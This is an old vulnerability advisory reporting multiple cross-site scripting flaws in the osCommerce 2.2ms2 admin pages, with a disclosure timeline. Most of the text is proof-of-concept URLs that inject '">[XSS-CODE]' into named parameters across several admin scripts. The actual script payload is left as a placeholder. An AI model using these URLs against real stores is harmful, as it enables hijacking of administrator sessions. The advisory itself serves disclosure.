oscommerce-xss.txt

`##########################################  
Oscommerce Multiple XSS in admin section.  
Vendor url:Http://www.oscommerce.com  
Advisore:http://lostmon.blogspot.com/2006/11/  
oscommerce-multiple-xss-in-admin.html  
Vendor notify:YES Exploit available: YES  
##########################################  
  
osCommerce contains a flaw that allows a remote cross site  
scripting attack.This flaw exists because the application does  
not validate multiple params upon submission to multiple scripts  
in /admin folder.This could allow a user to create a specially  
crafted URL that would execute arbitrary code in a user's browser  
within the trust relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
  
####################  
versions  
####################  
  
Oscommerce -2.2ms2-060817  
  
  
###################  
SOLUTION  
###################  
  
No solution was available at this time.  
  
  
################  
timeline  
################  
  
Discovered:29-10-2006  
vendor notify:20-11-2006  
vendor response  
disclosure:21-11-2006  
  
#################  
Examples  
#################  
  
If the server have auth implemented  
for exploit all of this flaws you  
need to login , before.  
  
-------------------------------  
gID param in configuration.php  
-------------------------------  
  
http://[Victim]/catalog/admin/configuration.php?  
gID=1">[XSS-CODE]&cID=3  
  
--------------------------  
Set param in modules.php  
--------------------------  
  
http://localhost/catalog/admin/modules.php?selected_box=modules  
&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5  
  
http://localhost/catalog/admin/modules.php?set=payment  
">[XSS-CODE]&module=pm2checkout  
  
http://localhost/catalog/admin/modules.php?set=ordertotal  
&module=ot_loworderfee">[XSS-CODE]&action=edit  
  
--------------------------------------------------  
option_order_by ,value_page ,option_page ,products  
_options_name in products_attributes.php  
--------------------------------------------------  
  
http://[Victim]/catalog/admin/products_attributes.php?  
action=update_option&option_id=1&option_order_by=">  
[XSS-CODE]&products_options_id&option_page=1  
  
http://[Victim]/definitiva/admin/products_attributes.php?  
option_order_by=products_options_id&value_page=2">[XSS-CODE]  
  
http://[Victim]/definitiva/admin/products_attributes.php?  
option_page=1&option_order_by=products_options_name">[XSS-CODE]  
  
http://[Victim]/definitiva/admin/products_attributes.php?  
action=update_option&option_id=1&option_order_by=products  
_options_id&option_page=1">[XSS-CODE]  
  
http://[Victim]/catalog/admin/products_attributes.php?  
action=update_option&option_id=1&option_order_by=products  
_options_id&option_page=1">[XSS-CODE]  
  
----------------------------------------------------  
lID param in languages.php  
---------------------------------------------  
  
  
http://localhost/definitiva/admin/languages.php?page=1&  
lID=3">[XSS-CODE]&action=new  
  
-------------------------------  
selected_box,cID in customers.php  
-------------------------------  
  
http://localhost/definitiva/admin/customers.php?page=1  
&cID=1[XSS-CODE]&action=edit  
  
http://[Victim]/catalog/admin/customers.php?selected_box=  
customers">[XSS-CODE]  
  
-------------------------------  
spage,zID,sID in geo_zones.php  
-------------------------------  
  
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&  
action=list&spage=1">[XSS-CODE]&sID=1&saction=edit  
  
http://localhost/definitiva/admin/geo_zones.php?zpage=1&  
zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit  
  
http://localhost/definitiva/admin/geo_zones.php?zpage=1  
&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new  
  
######################## €nd #####################  
  
Thnx to Estrella to be my ligth.  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`